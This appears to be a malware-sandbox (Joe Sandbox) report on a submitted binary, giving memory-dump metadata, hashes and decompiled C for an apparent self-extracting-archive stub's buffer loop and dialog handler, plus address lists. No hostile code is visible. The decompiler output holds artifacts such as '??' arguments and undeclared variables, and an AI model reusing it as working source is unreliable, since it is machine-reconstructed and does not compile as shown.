Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5e700f4afe8f7cb2d4a66ad18727e2e55adcd7177c3273d69481a5e6695808a2
Instruction ID: 5359ab3c4136e314589251c233b1ff11e332082eafb0c275528b4168551a60a6
Opcode Fuzzy Hash: 5e700f4afe8f7cb2d4a66ad18727e2e55adcd7177c3273d69481a5e6695808a2
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00B76CDC Relevance: .3, Instructions: 343
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00B76CDC(signed int __ecx, void* __edx) {
				void* __ebp;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t176;
				signed int _t179;
				intOrPtr _t182;
				signed int _t185;
				signed int _t186;
				void* _t189;
				void* _t196;
				signed int _t201;
				signed int _t202;
				intOrPtr* _t203;
				signed int _t206;
				void* _t217;
				intOrPtr _t220;
				signed int _t223;
				signed int _t226;
				signed int _t230;
				signed int _t232;
				intOrPtr _t235;
				intOrPtr* _t236;
				intOrPtr* _t242;
				intOrPtr* _t244;
				void* _t247;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t257;
				signed int _t265;
				intOrPtr* _t269;
				intOrPtr _t272;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t280;
				intOrPtr* _t282;
				void* _t283;
				signed int _t284;
				intOrPtr* _t285;
				intOrPtr _t287;
				void* _t289;
				void* _t290;
				void* _t292;

				_t223 = __ecx; // executed
				E00B7359E(__ecx, __edx); // executed
				E00B74D0A(__ecx,  *((intOrPtr*)(_t290 + 0x244)));
				_t282 = _t223 + 0x18;
				_t249 = 0;
				 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				if( *(_t223 + 0x1c) +  *(_t223 + 0x1c) == 0) {
					 *((intOrPtr*)(_t290 + 0x14)) = _t282;
				} else {
					_t247 = 0;
					do {
						_t220 =  *_t282;
						_t247 = _t247 + 0x4ae4;
						_t249 = _t249 + 1;
						 *((char*)(_t220 + _t247 - 0x13)) = 0;
						 *((char*)(_t220 + _t247 - 0x11)) = 0;
					} while (_t249 <  *(_t223 + 0x1c) +  *(_t223 + 0x1c));
				}
				_t226 = 5;
				memcpy( *_t282 + 0x18, _t223 + 0x8c, _t226 << 2);
				E00B80320( *_t282 + 0x30, _t223 + 0xa0, 0x4a9c);
				_t292 = _t290 + 0x18;
				 *(_t292 + 0x30) = 0;
				_t265 = 0;
				 *((char*)(_t292 + 0x1b)) = 0;
				 *((char*)(_t292 + 0x13)) = 0;
				while(1) {
					L6:
					_t272 = 0;
					 *((intOrPtr*)(_t292 + 0x1c)) = 0;
					while(1) {
						L7:
						_push(0x00400000 - _t265 & 0xfffffff0);
						_push( *((intOrPtr*)(_t223 + 0x20)) + _t265);
						_t166 = E00B6D114( *_t223);
						 *((intOrPtr*)(_t292 + 0x34)) = _t166;
						if(_t166 < 0) {
							break;
						}
						_t265 = _t265 + _t166;
						 *(_t292 + 0x2c) = _t265;
						if(_t265 != 0) {
							if(_t166 <= 0 || _t265 >= 0x400) {
								if(_t272 >= _t265) {
									goto L69;
								} else {
									while(1) {
										_t252 = 0;
										 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
										 *(_t292 + 0x24) = 0;
										_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
										if(_t176 != 0) {
										}
										L13:
										_t235 = 0;
										 *((intOrPtr*)(_t292 + 0x20)) = 0;
										while(1) {
											_t280 =  *_t282 + _t235;
											 *(_t292 + 0x30) = _t252;
											_t29 = _t280 + 4; // 0x4
											_t236 = _t29;
											 *_t280 = _t223;
											if( *((char*)(_t280 + 0x4ad3)) == 0) {
												goto L16;
											}
											L15:
											 *(_t280 + 0x4acc) = _t265;
											L18:
											_t42 = _t280 + 0x18; // 0x18
											_t285 = _t42;
											 *((char*)(_t280 + 0x4ad3)) = 0;
											 *(_t280 + 0x4ae0) = _t252;
											 *((char*)(_t280 + 0x4ad2)) = _t176 & 0xffffff00 |  *((intOrPtr*)(_t292 + 0x34)) == 0x00000000;
											if( *((char*)(_t280 + 0x14)) != 0) {
												L23:
												if( *((char*)(_t292 + 0x1b)) != 0 ||  *_t285 > 0x20000) {
													 *((char*)(_t280 + 0x4ad1)) = 1;
													 *((char*)(_t292 + 0x1b)) = 1;
												} else {
													 *(_t292 + 0x28) =  *(_t292 + 0x28) + 1;
												}
												_t287 =  *((intOrPtr*)(_t292 + 0x1c)) +  *((intOrPtr*)(_t280 + 0x24)) +  *_t285;
												_t252 = _t252 + 1;
												 *((intOrPtr*)(_t292 + 0x1c)) = _t287;
												_t235 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
												 *(_t292 + 0x24) = _t252;
												 *((intOrPtr*)(_t292 + 0x20)) = _t235;
												_t217 = _t265 - _t287;
												if(_t217 < 0 ||  *((char*)(_t280 + 0x28)) == 0) {
													if(_t217 >= 0x400) {
														_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
														if(_t252 < _t176) {
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t280 =  *_t282 + _t235;
															 *(_t292 + 0x30) = _t252;
															_t29 = _t280 + 4; // 0x4
															_t236 = _t29;
															 *_t280 = _t223;
															if( *((char*)(_t280 + 0x4ad3)) == 0) {
																goto L16;
															}
														}
													}
												}
											} else {
												_push(_t285);
												_push(_t236);
												 *((char*)(_t280 + 0x14)) = 1;
												if(E00B73E0B(_t223) == 0 ||  *((char*)(_t280 + 0x29)) == 0 &&  *((char*)(_t223 + 0xe662)) == 0) {
													 *((char*)(_t292 + 0x13)) = 1;
												} else {
													_t252 =  *(_t292 + 0x24);
													 *((char*)(_t223 + 0xe662)) = 1;
													goto L23;
												}
											}
											break;
											L16:
											E00B6A85A(_t236,  *((intOrPtr*)(_t223 + 0x20)) +  *((intOrPtr*)(_t292 + 0x1c)));
											_t33 = _t280 + 4; // 0x4
											_t236 = _t33;
											 *((intOrPtr*)(_t236 + 4)) = 0;
											_t176 = _t265 -  *((intOrPtr*)(_t292 + 0x1c));
											__eflags = _t176;
											 *_t236 = 0;
											 *(_t280 + 0x4acc) = _t176;
											if(_t176 != 0) {
												 *((char*)(_t280 + 0x4ad0)) = 0;
												 *((char*)(_t280 + 0x14)) = 0;
												 *((char*)(_t280 + 0x2c)) = 0;
												_t252 =  *(_t292 + 0x24);
												goto L18;
											}
											break;
										}
										L33:
										_t232 =  *(_t292 + 0x28);
										_t275 = _t232 /  *(_t223 + 0x1c);
										_t179 = _t232;
										__eflags = _t179 %  *(_t223 + 0x1c);
										if(_t179 %  *(_t223 + 0x1c) != 0) {
											_t275 = _t275 + 1;
											__eflags = _t275;
										}
										_t283 = 0;
										__eflags = _t232;
										if(_t232 != 0) {
											_t269 =  *((intOrPtr*)(_t292 + 0x14));
											_t257 = 0;
											_t202 = _t275 * 0x4ae4;
											__eflags = _t202;
											 *((intOrPtr*)(_t292 + 0x20)) = 0;
											 *(_t292 + 0x38) = _t202;
											_t203 = _t292 + 0x40;
											do {
												_t258 = _t257 +  *_t269;
												_t244 = _t203;
												 *((intOrPtr*)(_t292 + 0x3c)) = _t203 + 8;
												_t206 =  *(_t292 + 0x28) - _t283;
												 *_t244 = _t257 +  *_t269;
												__eflags = _t275 - _t206;
												if(_t275 < _t206) {
													_t206 = _t275;
												}
												__eflags =  *(_t292 + 0x24) - 1;
												 *(_t244 + 4) = _t206;
												if( *(_t292 + 0x24) != 1) {
													E00B70F86( *((intOrPtr*)(_t223 + 0x14)), E00B777C0, _t244);
												} else {
													E00B77153(_t223, _t258);
												}
												_t283 = _t283 + _t275;
												_t257 =  *((intOrPtr*)(_t292 + 0x20)) +  *(_t292 + 0x38);
												_t203 =  *((intOrPtr*)(_t292 + 0x3c));
												 *((intOrPtr*)(_t292 + 0x20)) = _t257;
												__eflags = _t283 -  *(_t292 + 0x28);
											} while (_t283 <  *(_t292 + 0x28));
											_t265 =  *(_t292 + 0x2c);
										}
										_t284 =  *(_t292 + 0x24);
										__eflags = _t284;
										if(_t284 == 0) {
											_t272 =  *((intOrPtr*)(_t292 + 0x1c));
											goto L68;
										} else {
											E00B711CF( *((intOrPtr*)(_t223 + 0x14)));
											_t276 = 0;
											__eflags = _t284;
											if(_t284 == 0) {
												L55:
												__eflags =  *((char*)(_t292 + 0x13));
												if( *((char*)(_t292 + 0x13)) == 0) {
													_t182 =  *((intOrPtr*)(_t292 + 0x1c));
													_t278 = _t265 - _t182;
													__eflags = _t278 - 0x400;
													if(_t278 < 0x400) {
														__eflags = _t278;
														if(__eflags >= 0) {
															if(__eflags > 0) {
																__eflags = _t182 +  *((intOrPtr*)(_t223 + 0x20));
																E00B80320( *((intOrPtr*)(_t223 + 0x20)), _t182 +  *((intOrPtr*)(_t223 + 0x20)), _t278);
																_t292 = _t292 + 0xc;
															}
															_t282 =  *((intOrPtr*)(_t292 + 0x14));
															_t265 = _t278;
															goto L6;
														}
													} else {
														_t282 =  *((intOrPtr*)(_t292 + 0x14));
														_t272 = _t182;
														__eflags = _t272 - _t265;
														if(_t272 >= _t265) {
															goto L7;
														} else {
															_t252 = 0;
															 *(_t292 + 0x28) =  *(_t292 + 0x28) & 0;
															 *(_t292 + 0x24) = 0;
															_t176 =  *(_t223 + 0x1c) +  *(_t223 + 0x1c);
															if(_t176 != 0) {
															}
															goto L33;
														}
													}
												}
											} else {
												_t185 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t292 + 0x20)) = 0;
												do {
													_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14)))) + _t185;
													__eflags =  *((char*)(_t289 + 0x4ad1));
													if( *((char*)(_t289 + 0x4ad1)) != 0) {
														L50:
														_t186 = E00B777EF(_t223, _t289);
														__eflags = _t186;
														if(_t186 != 0) {
															goto L51;
														}
													} else {
														_t201 = E00B7390D(_t223, _t289);
														__eflags = _t201;
														if(_t201 != 0) {
															__eflags =  *((char*)(_t289 + 0x4ad1));
															if( *((char*)(_t289 + 0x4ad1)) == 0) {
																L51:
																__eflags =  *((char*)(_t289 + 0x4ad0));
																if( *((char*)(_t289 + 0x4ad0)) == 0) {
																	__eflags =  *((char*)(_t289 + 0x4ad3));
																	if( *((char*)(_t289 + 0x4ad3)) != 0) {
																		_t241 =  *((intOrPtr*)(_t223 + 0x20));
																		_t189 =  *((intOrPtr*)(_t289 + 0x10)) -  *((intOrPtr*)(_t223 + 0x20)) +  *(_t289 + 4);
																		__eflags = _t265 - _t189;
																		if(_t265 > _t189) {
																			_t265 = _t265 - _t189;
																			 *(_t292 + 0x38) = _t265;
																			E00B80320(_t241, _t189 + _t241, _t265);
																			_t292 = _t292 + 0xc;
																			 *((intOrPtr*)(_t289 + 0x18)) =  *((intOrPtr*)(_t289 + 0x18)) +  *(_t289 + 0x20) -  *(_t289 + 4);
																			 *(_t289 + 0x24) =  *(_t289 + 0x24) & 0x00000000;
																			 *(_t289 + 0x20) =  *(_t289 + 0x20) & 0x00000000;
																			 *(_t289 + 4) =  *(_t289 + 4) & 0x00000000;
																			 *((intOrPtr*)(_t289 + 0x10)) =  *((intOrPtr*)(_t223 + 0x20));
																			__eflags = _t276;
																			if(_t276 != 0) {
																				_t196 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
																				E00B80320(_t196, _t289, 0x4ae4);
																				_t242 =  *((intOrPtr*)(_t292 + 0x20));
																				_t292 = _t292 + 0xc;
																				 *((intOrPtr*)( *_t242 + 0x4ad4)) =  *((intOrPtr*)(_t196 + 0x4ad4));
																				 *((intOrPtr*)( *_t242 + 0x4adc)) =  *((intOrPtr*)(_t196 + 0x4adc));
																				_t265 =  *(_t292 + 0x2c);
																				 *((char*)(_t289 + 0x4ad3)) = 0;
																			}
																			_t272 = 0;
																			 *((intOrPtr*)(_t292 + 0x1c)) = 0;
																			L68:
																			_t282 =  *((intOrPtr*)(_t292 + 0x14));
																			goto L69;
																		}
																	} else {
																		__eflags =  *((char*)(_t289 + 0x28));
																		if( *((char*)(_t289 + 0x28)) == 0) {
																			goto L54;
																		}
																	}
																}
															} else {
																goto L50;
															}
														}
													}
													goto L70;
													L54:
													_t276 = _t276 + 1;
													_t185 =  *((intOrPtr*)(_t292 + 0x20)) + 0x4ae4;
													 *((intOrPtr*)(_t292 + 0x20)) = _t185;
													__eflags = _t276 -  *(_t292 + 0x24);
												} while (_t276 <  *(_t292 + 0x24));
												goto L55;
											}
										}
										goto L70;
									}
								}
							} else {
								L69:
								__eflags =  *((char*)(_t292 + 0x13));
								if( *((char*)(_t292 + 0x13)) == 0) {
									continue;
								}
							}
						}
						break;
					}
					L70:
					 *(_t223 + 0x7c) =  *(_t223 + 0x7c) &  *(_t223 + 0xe6dc);
					E00B75202(_t223);
					_t250 =  *(_t292 + 0x30) * 0x4ae4;
					_t230 = 5;
					_t170 =  *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x14))));
					__eflags = _t170 + _t250 + 0x30;
					return E00B80320(memcpy(_t223 + 0x8c, _t250 + 0x18 + _t170, _t230 << 2), _t170 + _t250 + 0x30, 0x4a9c);
				}
			}

0x00b76ce6
0x00b76ce8
0x00b76cf6
0x00b76cfe
0x00b76d01
0x00b76d03
0x00b76d09
0x00b76d2c
0x00b76d0b
0x00b76d0b
0x00b76d0d
0x00b76d0d
0x00b76d10
0x00b76d16
0x00b76d17
0x00b76d1c
0x00b76d26
0x00b76d2a
0x00b76d3b
0x00b76d4b
0x00b76d54
0x00b76d5b
0x00b76d5e
0x00b76d62
0x00b76d64
0x00b76d68
0x00b76d6c
0x00b76d6c
0x00b76d6c
0x00b76d6e
0x00b76d72
0x00b76d72
0x00b76d7e
0x00b76d84
0x00b76d85
0x00b76d8a
0x00b76d90
0x00000000
0x00000000
0x00b76d96
0x00b76d98
0x00b76d9c
0x00b76da4
0x00b76db4
0x00000000
0x00000000
0x00b76dba
0x00b76dbd
0x00b76dbf
0x00b76dc3
0x00b76dc7
0x00b76dc9
0x00b76dc9
0x00b76dcf
0x00b76dcf
0x00b76dd1
0x00b76dd5
0x00b76dd8
0x00b76dda
0x00b76de5
0x00b76de5
0x00b76de8
0x00b76dea
0x00000000
0x00000000
0x00b76dec
0x00b76dec
0x00b76e2d
0x00b76e32
0x00b76e32
0x00b76e35
0x00b76e3f
0x00b76e49
0x00b76e4f
0x00b76e80
0x00b76e85
0x00b76e96
0x00b76e9d
0x00b76e90
0x00b76e90
0x00b76e90
0x00b76eb0
0x00b76eb2
0x00b76eb3
0x00b76eb7
0x00b76ebd
0x00b76ec3
0x00b76ec7
0x00b76ec9
0x00b76ed6
0x00b76edb
0x00b76edf
0x00b76ee1
0x00b76dd8
0x00b76dda
0x00b76de5
0x00b76de5
0x00b76de8
0x00b76dea
0x00000000
0x00000000
0x00b76dea
0x00b76edf
0x00b76ed6
0x00b76e51
0x00b76e51
0x00b76e52
0x00b76e55
0x00b76e60
0x00b76eea
0x00b76e75
0x00b76e75
0x00b76e79
0x00000000
0x00b76e79
0x00b76e60
0x00000000
0x00b76df4
0x00b76dfc
0x00b76e03
0x00b76e03
0x00b76e08
0x00b76e0b
0x00b76e0b
0x00b76e0f
0x00b76e11
0x00b76e17
0x00b76e1d
0x00b76e23
0x00b76e26
0x00b76e29
0x00000000
0x00b76e29
0x00000000
0x00b76e17
0x00b76eef
0x00b76eef
0x00b76efc
0x00b76efe
0x00b76f03
0x00b76f05
0x00b76f07
0x00b76f07
0x00b76f07
0x00b76f08
0x00b76f0a
0x00b76f0c
0x00b76f0e
0x00b76f12
0x00b76f14
0x00b76f14
0x00b76f1a
0x00b76f1e
0x00b76f22
0x00b76f26
0x00b76f26
0x00b76f28
0x00b76f2d
0x00b76f35
0x00b76f37
0x00b76f39
0x00b76f3b
0x00b76f3d
0x00b76f3d
0x00b76f3f
0x00b76f44
0x00b76f47
0x00b76f5c
0x00b76f49
0x00b76f4c
0x00b76f4c
0x00b76f65
0x00b76f67
0x00b76f6b
0x00b76f6f
0x00b76f73
0x00b76f73
0x00b76f79
0x00b76f79
0x00b76f7d
0x00b76f81
0x00b76f83
0x00b770eb
0x00000000
0x00b76f89
0x00b76f8c
0x00b76f91
0x00b76f93
0x00b76f95
0x00b7700b
0x00b7700b
0x00b77010
0x00b77016
0x00b7701c
0x00b7701e
0x00b77024
0x00b770ca
0x00b770cc
0x00b770ce
0x00b770d3
0x00b770d8
0x00b770dd
0x00b770dd
0x00b770e0
0x00b770e4
0x00000000
0x00b770e4
0x00b7702a
0x00b7702a
0x00b7702e
0x00b77030
0x00b77032
0x00000000
0x00b77038
0x00b76dbd
0x00b76dbf
0x00b76dc3
0x00b76dc7
0x00b76dc9
0x00b76dc9
0x00000000
0x00b76dc9
0x00b77032
0x00b77024
0x00b76f97
0x00b76f97
0x00b76f97
0x00b76f99
0x00b76f9d
0x00b76fa3
0x00b76fa5
0x00b76fac
0x00b76fc7
0x00b76fca
0x00b76fcf
0x00b76fd1
0x00000000
0x00000000
0x00b76fae
0x00b76fb1
0x00b76fb6
0x00b76fb8
0x00b76fbe
0x00b76fc5
0x00b76fd7
0x00b76fd7
0x00b76fde
0x00b76fe4
0x00b76feb
0x00b77040
0x00b77045
0x00b77048
0x00b7704a
0x00b77050
0x00b77057
0x00b7705b
0x00b77063
0x00b77069
0x00b7706c
0x00b77070
0x00b77077
0x00b7707b
0x00b7707e
0x00b77080
0x00b7708c
0x00b7709b
0x00b770a0
0x00b770a4
0x00b770a9
0x00b770b1
0x00b770b7
0x00b770bb
0x00b770bb
0x00b770c2
0x00b770c4
0x00b770ef
0x00b770ef
0x00000000
0x00b770ef
0x00b76fed
0x00b76fed
0x00b76ff1
0x00000000
0x00000000
0x00b76ff1
0x00b76feb
0x00000000
0x00000000
0x00000000
0x00b76fc5
0x00b76fb8
0x00000000
0x00b76ff7
0x00b76ffb
0x00b76ffc
0x00b77001
0x00b77005
0x00b77005
0x00000000
0x00b76f9d
0x00b76f95
0x00000000
0x00b76f83
0x00b76dba
0x00b770f3
0x00b770f3
0x00b770f3
0x00b770f8
0x00000000
0x00000000
0x00b770f8
0x00b76da4
0x00000000
0x00b76d9c
0x00b770fe
0x00b77106
0x00b77109
0x00b7710e
0x00b77122
0x00b77128
0x00b77132
0x00b77150
0x00b77150

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 1c1bfa819a34d182777339a6e5e7cee3f2ddbf4c3e8f0f9141f6e36330c93fa3
Instruction ID: 790d9f5c6a8d1f5dc6ff9c25525d493c8a4e353d2b1e48748c84c7bad94f86aa
Opcode Fuzzy Hash: 1c1bfa819a34d182777339a6e5e7cee3f2ddbf4c3e8f0f9141f6e36330c93fa3
Instruction Fuzzy Hash: 08D1C5716487418FDB24DF28C88475BBBE1FF89308F0885ADE8AD9B242D774E905CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00B7B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731
windowfilesleepCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00B7B7E0(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* _t105;
				int _t106;
				long _t108;
				long _t109;
				struct HWND__* _t110;
				struct HWND__* _t114;
				void* _t117;
				void* _t118;
				void* _t135;
				void* _t139;
				signed int _t152;
				struct HWND__* _t155;
				void* _t173;
				int _t186;
				signed int _t201;
				void* _t202;
				long _t210;
				void* _t220;
				void* _t234;
				signed int _t244;
				void* _t245;
				void* _t260;
				long _t262;
				long _t263;
				long _t264;
				int _t278;
				int _t280;
				void* _t285;
				void* _t289;
				int _t293;
				void* _t296;
				WCHAR* _t298;
				intOrPtr _t299;
				intOrPtr _t300;
				struct HWND__* _t311;
				intOrPtr _t314;
				void* _t316;
				struct HWND__* _t317;
				void* _t318;
				struct HWND__* _t320;
				long _t321;
				struct HWND__* _t322;
				intOrPtr _t323;
				void* _t325;
				void* _t327;
				void* _t328;
				void* _t330;

				_t309 = __edx;
				_t296 = __ecx;
				E00B7EB78(0xb92b04, _t328);
				E00B7EC50(0xfe80);
				_t314 =  *((intOrPtr*)(_t328 + 0xc));
				_t311 =  *(_t328 + 8);
				_t105 = E00B61316(__edx, _t311, _t314,  *(_t328 + 0x10),  *((intOrPtr*)(_t328 + 0x14)), L"STARTDLG", 0, 0);
				_t293 = 1;
				if(_t105 != 0) {
					L128:
					_t106 = _t293;
					L129:
					 *[fs:0x0] =  *((intOrPtr*)(_t328 - 0xc));
					return _t106;
				}
				_t316 = _t314 - 0x110;
				if(_t316 == 0) {
					_push(_t311);
					E00B7D69E(_t296, __edx, __eflags, __fp0);
					_t108 =  *0xbb7b7c;
					 *0xba8450 = _t311;
					 *0xba8458 = _t311;
					__eflags = _t108;
					if(_t108 != 0) {
						SendMessageW(_t311, 0x80, 1, _t108); // executed
					}
					_t109 =  *0xbbec84;
					__eflags = _t109;
					if(_t109 != 0) {
						SendDlgItemMessageW(_t311, 0x6c, 0x172, 0, _t109); // executed
					}
					_t110 = GetDlgItem(_t311, 0x68);
					 *(_t328 - 0x14) = _t110;
					SendMessageW(_t110, 0x435, 0, 0x400000);
					E00B7A64D(_t328 - 0x3474, 0x800);
					_t114 = GetDlgItem(_t311, 0x66);
					__eflags =  *0xbaa472;
					_t317 = _t114;
					 *(_t328 - 0x18) = _t317;
					_t298 = 0xbaa472;
					if( *0xbaa472 == 0) {
						_t298 = _t328 - 0x3474;
					}
					SetWindowTextW(_t317, _t298);
					E00B7ABAB(_t317); // executed
					_push(0xbbfca0);
					_push(0xbbfc90);
					_push(0xbbec90);
					_push(_t311);
					 *0xba8463 = 0; // executed
					_t117 = E00B7B093(_t298, _t309, __eflags); // executed
					__eflags = _t117;
					if(_t117 == 0) {
						 *0xba8456 = _t293;
					}
					__eflags =  *0xbbfca0;
					if( *0xbbfca0 > 0) {
						_push(7);
						_push( *0xbbfc90);
						_push(_t311);
						E00B7C73F(_t309, _t311);
					}
					__eflags =  *0xbac577;
					if( *0xbac577 == 0) {
						SetDlgItemTextW(_t311, 0x6b, E00B6E617(0xbf));
						SetDlgItemTextW(_t311, _t293, E00B6E617(0xbe));
					}
					__eflags =  *0xbbfca0;
					if( *0xbbfca0 <= 0) {
						L104:
						__eflags =  *0xba8463;
						if( *0xba8463 != 0) {
							L116:
							__eflags =  *0xbaa46c - 2;
							if( *0xbaa46c == 2) {
								EnableWindow(_t317, 0);
							}
							__eflags =  *0xba9468;
							if( *0xba9468 != 0) {
								E00B612D3(_t311, 0x67, 0);
								E00B612D3(_t311, 0x66, 0);
							}
							_t118 =  *0xbaa46c;
							__eflags = _t118;
							if(_t118 != 0) {
								__eflags =  *0xba8454;
								if( *0xba8454 == 0) {
									_push(0);
									_push(_t293);
									_push(0x111);
									_push(_t311);
									__eflags = _t118 - _t293;
									if(_t118 != _t293) {
										 *0xbc30a0();
									} else {
										SendMessageW(); // executed
									}
								}
							}
							__eflags =  *0xba8456;
							if( *0xba8456 != 0) {
								_push(E00B6E617(0x90));
								_push(_t293);
								L127:
								SetDlgItemTextW(_t311, ??, ??);
							}
							goto L128;
						}
						__eflags =  *0xbbfc94;
						if( *0xbbfc94 != 0) {
							goto L116;
						}
						__eflags =  *0xbaa46c;
						if( *0xbaa46c != 0) {
							goto L116;
						}
						__eflags = 0;
						_t318 = 0xaa;
						 *((short*)(_t328 - 0x7874)) = 0;
						goto L108;
						do {
							while(1) {
								L108:
								__eflags = _t318 - 0xaa;
								if(_t318 != 0xaa) {
									goto L110;
								}
								__eflags =  *0xbac577;
								if( *0xbac577 == 0) {
									break;
								}
								L110:
								__eflags = _t318 - 0xab;
								if(__eflags != 0) {
									L113:
									E00B705DA(__eflags, _t328 - 0x7874, " ", 0x2000);
									E00B705DA(__eflags, _t328 - 0x7874, E00B6E617(_t318), 0x2000);
									break;
								}
								__eflags =  *0xbac577;
								if(__eflags == 0) {
									goto L113;
								}
								_t318 = _t318 + 1;
							}
							_t318 = _t318 + 1;
							__eflags = _t318 - 0xb0;
						} while (__eflags <= 0);
						_t299 =  *0xba8440; // 0x0
						E00B79ED5(_t299, __eflags,  *0xba102c,  *(_t328 - 0x14), _t328 - 0x7874, 0, 0);
						_t317 =  *(_t328 - 0x18);
						goto L116;
					} else {
						_push(0);
						_push( *0xbbfc90);
						_push(_t311); // executed
						E00B7C73F(_t309, _t311); // executed
						_t135 =  *0xbbfc94;
						__eflags = _t135;
						if(_t135 != 0) {
							__eflags =  *0xbaa46c;
							if(__eflags == 0) {
								_t300 =  *0xba8440; // 0x0
								E00B79ED5(_t300, __eflags,  *0xba102c,  *(_t328 - 0x14), _t135, 0, 0);
								L00B83E2E( *0xbbfc94);
							}
						}
						__eflags =  *0xbaa46c - _t293;
						if( *0xbaa46c == _t293) {
							L103:
							_push(_t293);
							_push( *0xbbfc90);
							_push(_t311);
							E00B7C73F(_t309, _t311);
							goto L104;
						} else {
							 *0xbc30c0(_t311);
							__eflags =  *0xbaa46c - _t293;
							if( *0xbaa46c == _t293) {
								goto L103;
							}
							__eflags =  *0xbaa471;
							if( *0xbaa471 != 0) {
								goto L103;
							}
							_push(3);
							_push( *0xbbfc90);
							_push(_t311);
							E00B7C73F(_t309, _t311);
							__eflags =  *0xbbfc98;
							if( *0xbbfc98 == 0) {
								goto L103;
							}
							_t139 = DialogBoxParamW( *0xba102c, L"LICENSEDLG", 0, E00B7B5C0, 0);
							__eflags = _t139;
							if(_t139 == 0) {
								L23:
								 *0xba8454 = _t293;
								L24:
								_push(_t293);
								L25:
								 *0xbc30b0(_t311); // executed
								goto L128;
							}
							goto L103;
						}
					}
				}
				if(_t316 != 1) {
					L6:
					_t106 = 0;
					goto L129;
				}
				_t152 = ( *(_t328 + 0x10) & 0x0000ffff) - 1;
				if(_t152 == 0) {
					__eflags =  *0xba8455;
					if( *0xba8455 != 0) {
						L21:
						GetDlgItemTextW(_t311, 0x66, _t328 - 0x2474, 0x800);
						__eflags =  *0xba8455;
						if( *0xba8455 == 0) {
							__eflags =  *0xba8456;
							if( *0xba8456 == 0) {
								_t155 = GetDlgItem(_t311, 0x68);
								__eflags =  *0xba845c;
								_t320 = _t155;
								if( *0xba845c == 0) {
									SendMessageW(_t320, 0xb1, 0, 0xffffffff);
									SendMessageW(_t320, 0xc2, 0, 0xb935f4);
								}
								SetFocus(_t320);
								__eflags =  *0xba9468;
								if( *0xba9468 == 0) {
									_t321 = 0x800;
									E00B70602(_t328 - 0x1474, _t328 - 0x2474, 0x800);
									E00B7D453(_t296, _t328 - 0x1474, 0x800);
									E00B64092(_t328 - 0x4974, 0x880, E00B6E617(0xb9), _t328 - 0x1474);
									_t330 = _t330 + 0x10;
									_push(_t328 - 0x4974);
									_push(0);
									E00B7D4D4();
								} else {
									_push(E00B6E617(0xba));
									_push(0);
									E00B7D4D4();
									_t321 = 0x800;
								}
								__eflags =  *0xbaa471;
								if( *0xbaa471 == 0) {
									E00B7DB4B(_t328 - 0x2474);
								}
								 *(_t328 - 0xd) = 0;
								E00B6A0B1(_t293, _t296, _t311, _t328, _t328 - 0x2474, 0, 0);
								__eflags = 0;
								if(0 != 0) {
									L39:
									_t302 = E00B7AC04(_t328 - 0x2474);
									 *((char*)(_t328 - 0xe)) = _t302;
									__eflags = _t302;
									if(_t302 == 0) {
										_t263 = GetLastError();
										_t302 =  *((intOrPtr*)(_t328 - 0xe));
										__eflags = _t263 - 5;
										if(_t263 == 5) {
											 *(_t328 - 0xd) = _t293;
										}
									}
									_t173 =  *0xbaa471;
									__eflags = _t173;
									if(_t173 != 0) {
										L48:
										__eflags =  *((char*)(_t328 - 0xe));
										if( *((char*)(_t328 - 0xe)) != 0) {
											 *0xba844c = _t293;
											E00B612F1(_t311, 0x67, 0);
											E00B612F1(_t311, 0x66, 0);
											SetDlgItemTextW(_t311, _t293, E00B6E617(0xe6)); // executed
											E00B612F1(_t311, 0x69, _t293);
											SetDlgItemTextW(_t311, 0x65, 0xb935f4); // executed
											_t322 = GetDlgItem(_t311, 0x65);
